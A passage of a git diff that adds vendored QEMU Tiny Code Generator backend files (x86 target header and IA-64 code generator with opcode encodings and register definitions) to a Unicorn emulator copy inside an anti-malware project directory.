tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_CALL_STACK); + + tcg_add_target_add_op_defs(s, x86_op_defs); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/i386/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/i386/tcg-target.h new file mode 100644 index 0000000..fdea43b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/i386/tcg-target.h @@ -0,0 
+1,148 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#ifndef TCG_TARGET_I386 +#define TCG_TARGET_I386 1 + +#define TCG_TARGET_INSN_UNIT_SIZE 1 + +#ifdef __x86_64__ +# define TCG_TARGET_REG_BITS 64 +# define TCG_TARGET_NB_REGS 16 +#else +# define TCG_TARGET_REG_BITS 32 +# define TCG_TARGET_NB_REGS 8 +#endif + +typedef enum { + TCG_REG_EAX = 0, + TCG_REG_ECX, + TCG_REG_EDX, + TCG_REG_EBX, + TCG_REG_ESP, + TCG_REG_EBP, + TCG_REG_ESI, + TCG_REG_EDI, + + /* 64-bit registers; always define the symbols to avoid + too much if-deffing. 
*/ + TCG_REG_R8, + TCG_REG_R9, + TCG_REG_R10, + TCG_REG_R11, + TCG_REG_R12, + TCG_REG_R13, + TCG_REG_R14, + TCG_REG_R15, + TCG_REG_RAX = TCG_REG_EAX, + TCG_REG_RCX = TCG_REG_ECX, + TCG_REG_RDX = TCG_REG_EDX, + TCG_REG_RBX = TCG_REG_EBX, + TCG_REG_RSP = TCG_REG_ESP, + TCG_REG_RBP = TCG_REG_EBP, + TCG_REG_RSI = TCG_REG_ESI, + TCG_REG_RDI = TCG_REG_EDI, +} TCGReg; + +/* used for function call generation */ +#define TCG_REG_CALL_STACK TCG_REG_ESP +#define TCG_TARGET_STACK_ALIGN 16 +#if defined(_WIN64) || (defined(__CYGWIN__) && defined(__x86_64__)) +#define TCG_TARGET_CALL_STACK_OFFSET 32 +#else +#define TCG_TARGET_CALL_STACK_OFFSET 0 +#endif + +extern bool have_bmi1; + +/* optional instructions */ +#define TCG_TARGET_HAS_div2_i32 1 +#define TCG_TARGET_HAS_rot_i32 1 +#define TCG_TARGET_HAS_ext8s_i32 1 +#define TCG_TARGET_HAS_ext16s_i32 1 +#define TCG_TARGET_HAS_ext8u_i32 1 +#define TCG_TARGET_HAS_ext16u_i32 1 +#define TCG_TARGET_HAS_bswap16_i32 1 +#define TCG_TARGET_HAS_bswap32_i32 1 +#define TCG_TARGET_HAS_neg_i32 1 +#define TCG_TARGET_HAS_not_i32 1 +#define TCG_TARGET_HAS_andc_i32 have_bmi1 +#define TCG_TARGET_HAS_orc_i32 0 +#define TCG_TARGET_HAS_eqv_i32 0 +#define TCG_TARGET_HAS_nand_i32 0 +#define TCG_TARGET_HAS_nor_i32 0 +#define TCG_TARGET_HAS_deposit_i32 1 +#define TCG_TARGET_HAS_movcond_i32 1 +#define TCG_TARGET_HAS_add2_i32 1 +#define TCG_TARGET_HAS_sub2_i32 1 +#define TCG_TARGET_HAS_mulu2_i32 1 +#define TCG_TARGET_HAS_muls2_i32 1 +#define TCG_TARGET_HAS_muluh_i32 0 +#define TCG_TARGET_HAS_mulsh_i32 0 + +#if TCG_TARGET_REG_BITS == 64 +#define TCG_TARGET_HAS_trunc_shr_i32 0 +#define TCG_TARGET_HAS_div2_i64 1 +#define TCG_TARGET_HAS_rot_i64 1 +#define TCG_TARGET_HAS_ext8s_i64 1 +#define TCG_TARGET_HAS_ext16s_i64 1 +#define TCG_TARGET_HAS_ext32s_i64 1 +#define TCG_TARGET_HAS_ext8u_i64 1 +#define TCG_TARGET_HAS_ext16u_i64 1 +#define TCG_TARGET_HAS_ext32u_i64 1 +#define TCG_TARGET_HAS_bswap16_i64 1 +#define TCG_TARGET_HAS_bswap32_i64 1 +#define 
TCG_TARGET_HAS_bswap64_i64 1 +#define TCG_TARGET_HAS_neg_i64 1 +#define TCG_TARGET_HAS_not_i64 1 +#define TCG_TARGET_HAS_andc_i64 have_bmi1 +#define TCG_TARGET_HAS_orc_i64 0 +#define TCG_TARGET_HAS_eqv_i64 0 +#define TCG_TARGET_HAS_nand_i64 0 +#define TCG_TARGET_HAS_nor_i64 0 +#define TCG_TARGET_HAS_deposit_i64 1 +#define TCG_TARGET_HAS_movcond_i64 1 +#define TCG_TARGET_HAS_add2_i64 1 +#define TCG_TARGET_HAS_sub2_i64 1 +#define TCG_TARGET_HAS_mulu2_i64 1 +#define TCG_TARGET_HAS_muls2_i64 1 +#define TCG_TARGET_HAS_muluh_i64 0 +#define TCG_TARGET_HAS_mulsh_i64 0 +#endif + +#define TCG_TARGET_deposit_i32_valid(ofs, len) \ + (((ofs) == 0 && (len) == 8) || ((ofs) == 8 && (len) == 8) || \ + ((ofs) == 0 && (len) == 16)) +#define TCG_TARGET_deposit_i64_valid TCG_TARGET_deposit_i32_valid + +#if TCG_TARGET_REG_BITS == 64 +# define TCG_AREG0 TCG_REG_R14 +#else +# define TCG_AREG0 TCG_REG_EBP +#endif + +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ia64/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ia64/tcg-target.c new file mode 100644 index 0000000..a7a681c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ia64/tcg-target.c @@ -0,0 +1,2446 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2009-2010 Aurelien Jarno + * Based on i386/tcg-target.c - Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies 
or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* + * Register definitions + */ + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { + "r0", "r1", "r2", "r3", "r4", "r5", "r6", "r7", + "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15", + "r16", "r17", "r18", "r19", "r20", "r21", "r22", "r23", + "r24", "r25", "r26", "r27", "r28", "r29", "r30", "r31", + "r32", "r33", "r34", "r35", "r36", "r37", "r38", "r39", + "r40", "r41", "r42", "r43", "r44", "r45", "r46", "r47", + "r48", "r49", "r50", "r51", "r52", "r53", "r54", "r55", + "r56", "r57", "r58", "r59", "r60", "r61", "r62", "r63", +}; +#endif + +#ifdef CONFIG_USE_GUEST_BASE +#define TCG_GUEST_BASE_REG TCG_REG_R55 +#else +#define TCG_GUEST_BASE_REG TCG_REG_R0 +#endif +#ifndef GUEST_BASE +#define GUEST_BASE 0 +#endif + +/* Branch registers */ +enum { + TCG_REG_B0 = 0, + TCG_REG_B1, + TCG_REG_B2, + TCG_REG_B3, + TCG_REG_B4, + TCG_REG_B5, + TCG_REG_B6, + TCG_REG_B7, +}; + +/* Floating point registers */ +enum { + TCG_REG_F0 = 0, + TCG_REG_F1, + TCG_REG_F2, + TCG_REG_F3, + TCG_REG_F4, + TCG_REG_F5, + TCG_REG_F6, + TCG_REG_F7, + TCG_REG_F8, + TCG_REG_F9, + TCG_REG_F10, + TCG_REG_F11, + TCG_REG_F12, + TCG_REG_F13, + TCG_REG_F14, + TCG_REG_F15, +}; + +/* Predicate registers */ +enum { + TCG_REG_P0 = 0, + TCG_REG_P1, + TCG_REG_P2, + TCG_REG_P3, + TCG_REG_P4, + TCG_REG_P5, + TCG_REG_P6, + TCG_REG_P7, + TCG_REG_P8, + TCG_REG_P9, + TCG_REG_P10, + TCG_REG_P11, + TCG_REG_P12, + TCG_REG_P13, + TCG_REG_P14, + 
TCG_REG_P15, +}; + +/* Application registers */ +enum { + TCG_REG_PFS = 64, +}; + +static const int tcg_target_reg_alloc_order[] = { + TCG_REG_R35, + TCG_REG_R36, + TCG_REG_R37, + TCG_REG_R38, + TCG_REG_R39, + TCG_REG_R40, + TCG_REG_R41, + TCG_REG_R42, + TCG_REG_R43, + TCG_REG_R44, + TCG_REG_R45, + TCG_REG_R46, + TCG_REG_R47, + TCG_REG_R48, + TCG_REG_R49, + TCG_REG_R50, + TCG_REG_R51, + TCG_REG_R52, + TCG_REG_R53, + TCG_REG_R54, + TCG_REG_R55, + TCG_REG_R14, + TCG_REG_R15, + TCG_REG_R16, + TCG_REG_R17, + TCG_REG_R18, + TCG_REG_R19, + TCG_REG_R20, + TCG_REG_R21, + TCG_REG_R22, + TCG_REG_R23, + TCG_REG_R24, + TCG_REG_R25, + TCG_REG_R26, + TCG_REG_R27, + TCG_REG_R28, + TCG_REG_R29, + TCG_REG_R30, + TCG_REG_R31, + TCG_REG_R56, + TCG_REG_R57, + TCG_REG_R58, + TCG_REG_R59, + TCG_REG_R60, + TCG_REG_R61, + TCG_REG_R62, + TCG_REG_R63, + TCG_REG_R8, + TCG_REG_R9, + TCG_REG_R10, + TCG_REG_R11 +}; + +static const int tcg_target_call_iarg_regs[8] = { + TCG_REG_R56, + TCG_REG_R57, + TCG_REG_R58, + TCG_REG_R59, + TCG_REG_R60, + TCG_REG_R61, + TCG_REG_R62, + TCG_REG_R63, +}; + +static const int tcg_target_call_oarg_regs[] = { + TCG_REG_R8 +}; + +/* + * opcode formation + */ + +/* bundle templates: stops (double bar in the IA64 manual) are marked with + an uppercase letter. 
*/ +enum { + mii = 0x00, + miI = 0x01, + mIi = 0x02, + mII = 0x03, + mlx = 0x04, + mLX = 0x05, + mmi = 0x08, + mmI = 0x09, + Mmi = 0x0a, + MmI = 0x0b, + mfi = 0x0c, + mfI = 0x0d, + mmf = 0x0e, + mmF = 0x0f, + mib = 0x10, + miB = 0x11, + mbb = 0x12, + mbB = 0x13, + bbb = 0x16, + bbB = 0x17, + mmb = 0x18, + mmB = 0x19, + mfb = 0x1c, + mfB = 0x1d, +}; + +enum { + OPC_ADD_A1 = 0x10000000000ull, + OPC_AND_A1 = 0x10060000000ull, + OPC_AND_A3 = 0x10160000000ull, + OPC_ANDCM_A1 = 0x10068000000ull, + OPC_ANDCM_A3 = 0x10168000000ull, + OPC_ADDS_A4 = 0x10800000000ull, + OPC_ADDL_A5 = 0x12000000000ull, + OPC_ALLOC_M34 = 0x02c00000000ull, + OPC_BR_DPTK_FEW_B1 = 0x08400000000ull, + OPC_BR_SPTK_MANY_B1 = 0x08000001000ull, + OPC_BR_CALL_SPNT_FEW_B3 = 0x0a200000000ull, + OPC_BR_SPTK_MANY_B4 = 0x00100001000ull, + OPC_BR_CALL_SPTK_MANY_B5 = 0x02100001000ull, + OPC_BR_RET_SPTK_MANY_B4 = 0x00108001100ull, + OPC_BRL_SPTK_MANY_X3 = 0x18000001000ull, + OPC_BRL_CALL_SPNT_MANY_X4 = 0x1a200001000ull, + OPC_BRL_CALL_SPTK_MANY_X4 = 0x1a000001000ull, + OPC_CMP_LT_A6 = 0x18000000000ull, + OPC_CMP_LTU_A6 = 0x1a000000000ull, + OPC_CMP_EQ_A6 = 0x1c000000000ull, + OPC_CMP4_LT_A6 = 0x18400000000ull, + OPC_CMP4_LTU_A6 = 0x1a400000000ull, + OPC_CMP4_EQ_A6 = 0x1c400000000ull, + OPC_DEP_I14 = 0x0ae00000000ull, + OPC_DEP_I15 = 0x08000000000ull, + OPC_DEP_Z_I12 = 0x0a600000000ull, + OPC_EXTR_I11 = 0x0a400002000ull, + OPC_EXTR_U_I11 = 0x0a400000000ull, + OPC_FCVT_FX_TRUNC_S1_F10 = 0x004d0000000ull, + OPC_FCVT_FXU_TRUNC_S1_F10 = 0x004d8000000ull, + OPC_FCVT_XF_F11 = 0x000e0000000ull, + OPC_FMA_S1_F1 = 0x10400000000ull, + OPC_FNMA_S1_F1 = 0x18400000000ull, + OPC_FRCPA_S1_F6 = 0x00600000000ull, + OPC_GETF_SIG_M19 = 0x08708000000ull, + OPC_LD1_M1 = 0x08000000000ull, + OPC_LD1_M3 = 0x0a000000000ull, + OPC_LD2_M1 = 0x08040000000ull, + OPC_LD2_M3 = 0x0a040000000ull, + OPC_LD4_M1 = 0x08080000000ull, + OPC_LD4_M3 = 0x0a080000000ull, + OPC_LD8_M1 = 0x080c0000000ull, + OPC_LD8_M3 = 0x0a0c0000000ull, + OPC_MUX1_I3 = 
0x0eca0000000ull, + OPC_NOP_B9 = 0x04008000000ull, + OPC_NOP_F16 = 0x00008000000ull, + OPC_NOP_I18 = 0x00008000000ull, + OPC_NOP_M48 = 0x00008000000ull, + OPC_MOV_I21 = 0x00e00100000ull, + OPC_MOV_RET_I21 = 0x00e00500000ull, + OPC_MOV_I22 = 0x00188000000ull, + OPC_MOV_I_I26 = 0x00150000000ull, + OPC_MOVL_X2 = 0x0c000000000ull, + OPC_OR_A1 = 0x10070000000ull, + OPC_OR_A3 = 0x10170000000ull, + OPC_SETF_EXP_M18 = 0x0c748000000ull, + OPC_SETF_SIG_M18 = 0x0c708000000ull, + OPC_SHL_I7 = 0x0f240000000ull, + OPC_SHR_I5 = 0x0f220000000ull, + OPC_SHR_U_I5 = 0x0f200000000ull, + OPC_SHRP_I10 = 0x0ac00000000ull, + OPC_SXT1_I29 = 0x000a0000000ull, + OPC_SXT2_I29 = 0x000a8000000ull, + OPC_SXT4_I29 = 0x000b0000000ull, + OPC_ST1_M4 = 0x08c00000000ull, + OPC_ST2_M4 = 0x08c40000000ull, + OPC_ST4_M4 = 0x08c80000000ull, + OPC_ST8_M4 = 0x08cc0000000ull, + OPC_SUB_A1 = 0x10028000000ull, + OPC_SUB_A3 = 0x10128000000ull, + OPC_UNPACK4_L_I2 = 0x0f860000000ull, + OPC_XMA_L_F2 = 0x1d000000000ull, + OPC_XOR_A1 = 0x10078000000ull, + OPC_XOR_A3 = 0x10178000000ull, + OPC_ZXT1_I29 = 0x00080000000ull, + OPC_ZXT2_I29 = 0x00088000000ull, + OPC_ZXT4_I29 = 0x00090000000ull, + + INSN_NOP_M = OPC_NOP_M48, /* nop.m 0 */ + INSN_NOP_I = OPC_NOP_I18, /* nop.i 0 */ +}; + +static inline uint64_t tcg_opc_a1(int qp, uint64_t opc, int r1, + int r2, int r3) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_a3(int qp, uint64_t opc, int r1, + uint64_t imm, int r3) +{ + return opc + | ((imm & 0x80) << 29) /* s */ + | ((imm & 0x7f) << 13) /* imm7b */ + | ((r3 & 0x7f) << 20) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_a4(int qp, uint64_t opc, int r1, + uint64_t imm, int r3) +{ + return opc + | ((imm & 0x2000) << 23) /* s */ + | ((imm & 0x1f80) << 20) /* imm6d */ + | ((imm & 0x007f) << 13) /* imm7b */ + | ((r3 & 0x7f) << 20) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t 
tcg_opc_a5(int qp, uint64_t opc, int r1, + uint64_t imm, int r3) +{ + return opc + | ((imm & 0x200000) << 15) /* s */ + | ((imm & 0x1f0000) << 6) /* imm5c */ + | ((imm & 0x00ff80) << 20) /* imm9d */ + | ((imm & 0x00007f) << 13) /* imm7b */ + | ((r3 & 0x03) << 20) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_a6(int qp, uint64_t opc, int p1, + int p2, int r2, int r3) +{ + return opc + | ((p2 & 0x3f) << 27) + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((p1 & 0x3f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_b1(int qp, uint64_t opc, uint64_t imm) +{ + return opc + | ((imm & 0x100000) << 16) /* s */ + | ((imm & 0x0fffff) << 13) /* imm20b */ + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_b3(int qp, uint64_t opc, int b1, uint64_t imm) +{ + return opc + | ((imm & 0x100000) << 16) /* s */ + | ((imm & 0x0fffff) << 13) /* imm20b */ + | ((b1 & 0x7) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_b4(int qp, uint64_t opc, int b2) +{ + return opc + | ((b2 & 0x7) << 13) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_b5(int qp, uint64_t opc, int b1, int b2) +{ + return opc + | ((b2 & 0x7) << 13) + | ((b1 & 0x7) << 6) + | (qp & 0x3f); +} + + +static inline uint64_t tcg_opc_b9(int qp, uint64_t opc, uint64_t imm) +{ + return opc + | ((imm & 0x100000) << 16) /* i */ + | ((imm & 0x0fffff) << 6) /* imm20a */ + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_f1(int qp, uint64_t opc, int f1, + int f3, int f4, int f2) +{ + return opc + | ((f4 & 0x7f) << 27) + | ((f3 & 0x7f) << 20) + | ((f2 & 0x7f) << 13) + | ((f1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_f2(int qp, uint64_t opc, int f1, + int f3, int f4, int f2) +{ + return opc + | ((f4 & 0x7f) << 27) + | ((f3 & 0x7f) << 20) + | ((f2 & 0x7f) << 13) + | ((f1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_f6(int qp, uint64_t opc, int f1, + int p2, int f2, int f3) +{ + return opc + | ((p2 & 0x3f) << 27) + | ((f3 & 
0x7f) << 20) + | ((f2 & 0x7f) << 13) + | ((f1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_f10(int qp, uint64_t opc, int f1, int f2) +{ + return opc + | ((f2 & 0x7f) << 13) + | ((f1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_f11(int qp, uint64_t opc, int f1, int f2) +{ + return opc + | ((f2 & 0x7f) << 13) + | ((f1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_f16(int qp, uint64_t opc, uint64_t imm) +{ + return opc + | ((imm & 0x100000) << 16) /* i */ + | ((imm & 0x0fffff) << 6) /* imm20a */ + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i2(int qp, uint64_t opc, int r1, + int r2, int r3) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i3(int qp, uint64_t opc, int r1, + int r2, int mbtype) +{ + return opc + | ((mbtype & 0x0f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i5(int qp, uint64_t opc, int r1, + int r3, int r2) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i7(int qp, uint64_t opc, int r1, + int r2, int r3) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i10(int qp, uint64_t opc, int r1, + int r2, int r3, uint64_t count) +{ + return opc + | ((count & 0x3f) << 27) + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i11(int qp, uint64_t opc, int r1, + int r3, uint64_t pos, uint64_t len) +{ + return opc + | ((len & 0x3f) << 27) + | ((r3 & 0x7f) << 20) + | ((pos & 0x3f) << 14) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i12(int qp, uint64_t opc, int r1, + int r2, uint64_t pos, uint64_t len) +{ + return opc + | ((len & 0x3f) << 27) + | ((pos & 
0x3f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i14(int qp, uint64_t opc, int r1, uint64_t imm, + int r3, uint64_t pos, uint64_t len) +{ + return opc + | ((imm & 0x01) << 36) + | ((len & 0x3f) << 27) + | ((r3 & 0x7f) << 20) + | ((pos & 0x3f) << 14) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i15(int qp, uint64_t opc, int r1, int r2, + int r3, uint64_t pos, uint64_t len) +{ + return opc + | ((pos & 0x3f) << 31) + | ((len & 0x0f) << 27) + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i18(int qp, uint64_t opc, uint64_t imm) +{ + return opc + | ((imm & 0x100000) << 16) /* i */ + | ((imm & 0x0fffff) << 6) /* imm20a */ + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i21(int qp, uint64_t opc, int b1, + int r2, uint64_t imm) +{ + return opc + | ((imm & 0x1ff) << 24) + | ((r2 & 0x7f) << 13) + | ((b1 & 0x7) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i22(int qp, uint64_t opc, int r1, int b2) +{ + return opc + | ((b2 & 0x7) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i26(int qp, uint64_t opc, int ar3, int r2) +{ + return opc + | ((ar3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i29(int qp, uint64_t opc, int r1, int r3) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_l2(uint64_t imm) +{ + return (imm & 0x7fffffffffc00000ull) >> 22; +} + +static inline uint64_t tcg_opc_l3(uint64_t imm) +{ + return (imm & 0x07fffffffff00000ull) >> 18; +} + +#define tcg_opc_l4 tcg_opc_l3 + +static inline uint64_t tcg_opc_m1(int qp, uint64_t opc, int r1, int r3) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_m3(int qp, uint64_t opc, int r1, + int r3, uint64_t imm) +{ + return opc 
+ | ((imm & 0x100) << 28) /* s */ + | ((imm & 0x080) << 20) /* i */ + | ((imm & 0x07f) << 13) /* imm7b */ + | ((r3 & 0x7f) << 20) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_m4(int qp, uint64_t opc, int r2, int r3) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_m18(int qp, uint64_t opc, int f1, int r2) +{ + return opc + | ((r2 & 0x7f) << 13) + | ((f1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_m19(int qp, uint64_t opc, int r1, int f2) +{ + return opc + | ((f2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_m34(int qp, uint64_t opc, int r1, + int sof, int sol, int sor) +{ + return opc + | ((sor & 0x0f) << 27) + | ((sol & 0x7f) << 20) + | ((sof & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_m48(int qp, uint64_t opc, uint64_t imm) +{ + return opc + | ((imm & 0x100000) << 16) /* i */ + | ((imm & 0x0fffff) << 6) /* imm20a */ + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_x2(int qp, uint64_t opc, + int r1, uint64_t imm) +{ + return opc + | ((imm & 0x8000000000000000ull) >> 27) /* i */ + | (imm & 0x0000000000200000ull) /* ic */ + | ((imm & 0x00000000001f0000ull) << 6) /* imm5c */ + | ((imm & 0x000000000000ff80ull) << 20) /* imm9d */ + | ((imm & 0x000000000000007full) << 13) /* imm7b */ + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_x3(int qp, uint64_t opc, uint64_t imm) +{ + return opc + | ((imm & 0x0800000000000000ull) >> 23) /* i */ + | ((imm & 0x00000000000fffffull) << 13) /* imm20b */ + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_x4(int qp, uint64_t opc, int b1, uint64_t imm) +{ + return opc + | ((imm & 0x0800000000000000ull) >> 23) /* i */ + | ((imm & 0x00000000000fffffull) << 13) /* imm20b */ + | ((b1 & 0x7) << 6) + | (qp & 0x3f); +} + + +/* + * Relocations - Note that we never encode branches elsewhere than 
slot 2. + */ + +static void reloc_pcrel21b_slot2(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + uint64_t imm = target - pc; + + pc->hi = (pc->hi & 0xf700000fffffffffull) + | ((imm & 0x100000) << 39) /* s */ + | ((imm & 0x0fffff) << 36); /* imm20b */ +} + +static uint64_t get_reloc_pcrel21b_slot2(tcg_insn_unit *pc) +{ + int64_t high = pc->hi; + + return ((high >> 39) & 0x100000) + /* s */ + ((high >> 36) & 0x0fffff); /* imm20b */ +} + +static void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + assert(addend == 0); + assert(type == R_IA64_PCREL21B); + reloc_pcrel21b_slot2(code_ptr, (tcg_insn_unit *)value); +} + +/* + * Constraints + */ + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, const char **pct_str) +{ + const char *ct_str; + + ct_str = *pct_str; + switch(ct_str[0]) { + case 'r': + ct->ct |= TCG_CT_REG; + tcg_regset_set(ct->u.regs, 0xffffffffffffffffull); + break; + case 'I': + ct->ct |= TCG_CT_CONST_S22; + break; + case 'S': + ct->ct |= TCG_CT_REG; + tcg_regset_set(ct->u.regs, 0xffffffffffffffffull); +#if defined(CONFIG_SOFTMMU) + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R56); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R57); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R58); +#endif + break; + case 'Z': + /* We are cheating a bit here, using the fact that the register + r0 is also the register number 0. Hence there is no need + to check for const_args in each instruction. 
*/ + ct->ct |= TCG_CT_CONST_ZERO; + break; + default: + return -1; + } + ct_str++; + *pct_str = ct_str; + return 0; +} + +/* test if a constant matches the constraint */ +static inline int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct; + ct = arg_ct->ct; + if (ct & TCG_CT_CONST) + return 1; + else if ((ct & TCG_CT_CONST_ZERO) && val == 0) + return 1; + else if ((ct & TCG_CT_CONST_S22) && val == ((int32_t)val << 10) >> 10) + return 1; + else + return 0; +} + +/* + * Code generation + */ + +static tcg_insn_unit *tb_ret_addr; + +static inline void tcg_out_bundle(TCGContext *s, int template, + uint64_t slot0, uint64_t slot1, + uint64_t slot2) +{ + template &= 0x1f; /* 5 bits */ + slot0 &= 0x1ffffffffffull; /* 41 bits */ + slot1 &= 0x1ffffffffffull; /* 41 bits */ + slot2 &= 0x1ffffffffffull; /* 41 bits */ + + *s->code_ptr++ = (tcg_insn_unit){ + (slot1 << 46) | (slot0 << 5) | template, + (slot2 << 23) | (slot1 >> 18) + }; +} + +static inline uint64_t tcg_opc_mov_a(int qp, TCGReg dst, TCGReg src) +{ + return tcg_opc_a4(qp, OPC_ADDS_A4, dst, 0, src); +} + +static inline void tcg_out_mov(TCGContext *s, TCGType type, + TCGReg ret, TCGReg arg) +{ + tcg_out_bundle(s, mmI, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_mov_a(TCG_REG_P0, ret, arg)); +} + +static inline uint64_t tcg_opc_movi_a(int qp, TCGReg dst, int64_t src) +{ + assert(src == sextract64(src, 0, 22)); + return tcg_opc_a5(qp, OPC_ADDL_A5, dst, src, TCG_REG_R0); +} + +static inline void 